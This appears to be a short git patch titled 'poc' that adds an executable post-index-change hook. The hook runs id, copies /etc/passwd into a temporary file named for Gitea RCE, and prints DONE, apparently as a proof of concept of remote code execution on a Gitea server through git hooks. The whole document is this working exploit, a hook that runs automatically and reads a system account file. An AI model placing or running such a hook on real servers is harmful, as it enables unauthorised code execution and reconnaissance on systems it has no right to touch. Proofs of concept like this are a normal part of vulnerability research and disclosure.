From 06fc8177cd7c219e99210017d491c08765cb1015 Mon Sep 17 00:00:00 2001 From: 33123aaa <1198891908@qq.com> Date: Thu, 30 Jul 2026 05:39:36 +0800 Subject: [PATCH] poc --- hooks/post-index-change | 4 ++++ 1 file changed, 4 insertions(+) create mode 100755 hooks/post-index-change diff --git a/hooks/post-index-change b/hooks/post-index-change new file mode 100755 index 0000000..f266c3e --- /dev/null +++ b/hooks/post-index-change @@ -0,0 +1,4 @@ +#!/bin/sh +id > /tmp/gitea_rce_$$ +cat /etc/passwd >> /tmp/gitea_rce_$$ +echo DONE